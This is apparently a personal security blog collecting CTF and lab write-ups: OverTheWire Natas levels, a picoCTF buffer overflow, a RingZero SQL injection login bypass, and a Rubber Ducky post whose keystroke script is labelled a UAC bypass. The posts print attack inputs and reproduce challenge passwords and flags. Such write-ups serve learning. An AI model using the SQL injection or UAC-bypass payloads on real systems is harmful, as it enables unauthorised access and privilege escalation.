circusmonkey404's Security Site

Over the wire Natas Level 3 Objective: Get password for Level 3 Solution: This page just shows a text box There is nothing on this page Let’s check the source code again There is nothing on this page <!-- No more information leaks!! Not even Google will find it this time... --> </div> Not Even Google will find it this time huh? What do we know that keeps web crawlers from indexing pages?   Robots.txt Let’s check out the robots.txt and see if there are any goodies in there. http://natas3.natas.labs.overthewire.org/robots.txt User-agent: * Disallow: /s3cr3t/ Disallow folder /s3cr3t/    it doesn’t want google to index that folder let’s see what is in there http://natas3.natas.labs.overthewire.org/s3cr3t/ another users.txt file http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Over the wire Natas Level 2 Objective : Get password for Level 3 Solution : This page just shows a text box There is nothing on this page  Ok let’s check the source and see if there is anything interesting in there In the HTML there is a img file that links to a file named pixel.png in a folder named files There is nothing on this page <img src=" files/pixel.png "> </div> </body></html> Lets see if we can see what else is in that folder http://natas2.natas.labs.overthewire.org/files/ there is a txt file in there named users.txt let’s check it out # username:password alice:BYNdCesZqW bob:jw2ueICLvT charlie:G5vCxkVV3m natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 eve:zo4mJWyNj2 mallory:9urtcpzBmH natas3 password sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Over the wire Natas Level 1 Objective : Get password for Level 2 Solution : This page just shows a text box You can find the password for the next level on this page, but rightclicking has been blocked! No right clicking…. Okay F11 in chrome brings up inspector so let’s use that to get the next password <!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Over the wire Natas Level 0 Objective: Get password for Level1 Solution: This page just shows a text box You can find the password for the next level on this page. Checking the source code we find the password for level 1 <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->

PIcoCTF 2018 – Binary Exploitation - buffer overflow0 Objective: Let's start off simple, can you overflow the right buffer in this program [1]   to get the flag? You can also find it in /problems/buffer-overflow-0_1_316c391426b9319fbdfb523ee15b37db on the shell server. Source [2] . Hints: (1)     How can you trigger the flag to print? (2) If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting. Solution:   I started by CDing over to the problem folder Ls shows us a flag file(Which we can’t open) the program and the c code The title tells us this is about a buffer over flow Running the program we get this ./vuln This program takes 1 argument. Ok let’s give it an argument ./vuln 1 Thanks! Received: 1 Lets try just throwing a bunch values at it ./vuln 11111111111111111111111111111111111 picoCTF{ov3rfl0ws_ar3nt_that_bad_3598a894} that was super simple but

RubberDUcky So I just got a rubber ducky and have been playing around with it Here is some of my first couple of days 1st thing I did was import the lanugauge in Notepad++ to write my scripts in you can find the xml file here ( https://forums.hak5.org/topic/21045-encoder-duckyscript-notepad-userdefinedlanguage/ ) I also set a custom console to compile the scripts using the duckencoder.jar CD: C:\users\********\Desktop\Ducky Current directory: C:\users\******\Desktop\Ducky java -jar duckencoder.jar -i ipconfig -o inject.bin I also changed the firmware to twin ducky so I can read/write to the SD card while running payload https://forums.hak5.org/topic/28162-firmware-introducing-twin-duck/ My first little scrip I borrowed a bit from some other posts but i'm still not entirely happy with it  REM *** UAC Bypass *** DELAY 3000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 500 ALT y DELAY 200 STRING reg add HKCU\So

RingZero – SQLi – Most Basic SQLi pattern Objective: Login for user /pass Solution: So let’s try inserting and OR ‘1’=’1’ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 Ok it looks like I put to many ‘ in the injection I tried let’s leave of the last ‘ ‘or’1’=’1 Got the flag Logged in... GOOD JOB! FLAG-238974289383274893